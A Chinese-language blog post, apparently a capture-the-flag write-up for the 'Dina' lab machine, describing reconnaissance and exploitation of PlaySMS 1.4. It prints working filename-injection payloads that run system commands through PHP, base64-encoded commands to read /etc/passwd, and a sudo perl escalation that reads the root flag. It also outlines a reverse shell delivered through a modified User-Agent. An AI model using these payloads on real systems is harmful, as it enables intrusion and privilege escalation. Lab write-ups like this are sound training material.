12.10.19

Dina CTF

這一關的主要漏洞有兩個分別是
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload
檔案名稱寫入漏洞,主要的問題是PHP裡面的$filename變數寫入方式有問題
電話簿寫入漏洞

靶機是192.168.1.101
掃描靶機












發現只有80有開啟
打開網頁看一看









nmap有掃到五個目錄
看一下















只有這個目錄,不一樣,看一下原始碼,有一些東西,很像是密碼










用dirb掃一下目錄,發現/secure












發現一個備份檔,解壓縮看看,有密碼,試一下前面的密碼freedom






有一個目錄/SecreTgatwayLogin,帳號為 touhid密碼試一下前面的是diana












因為這是檔案名稱漏洞所以,建立一個檔案
touch "<?php system('uname -a'); dia();?>.php"匯入
然後就會看到出現了,系統的版本
但是PHP無法解析斜線,所以要看到帳號就要轉base64
echo "cat /etc/passwd" | base64
Y2F0IC9ldGMvcGFzc3dkCg==
touch "<?php system(base64_decode('Y2F0IC9ldGMvcGFzc3dkCg==')); dia();?>.php"
那要看哪個程式,有root權限
touch "<?php system('sudo -l'); dia();?>.php"
發現是/usr/bin/perl










echo "sudo perl-e 'exec(\"cat /root/flag.txt\")'" | base64
c3VkbyBwZXJsLWUgJ2V4ZWMoImNhdCAvcm9vdC9mbGFnLnR4dCIpJwo=
創造一個檔案
touch "<?php system(base64_decode('c3VkbyBwZXJsIC1lICdleGVjKCJjYXQgL3Jvb3QvZmxhZy50eHQiKScK')); dia();?>.php"
直接讀取旗標
第二個是電話簿漏洞建立一個漏洞觸發的腳本

















再匯入CSV檔時要設定proxy,先轉到 
BurpSuite上去攔截修改封包用改cookie

里user-Agent的參數



 user-Agent的參數為id
 user-Agent的參數 設定為反向連結
連回本機
提權讀取flag,完成 


沒有留言:

張貼留言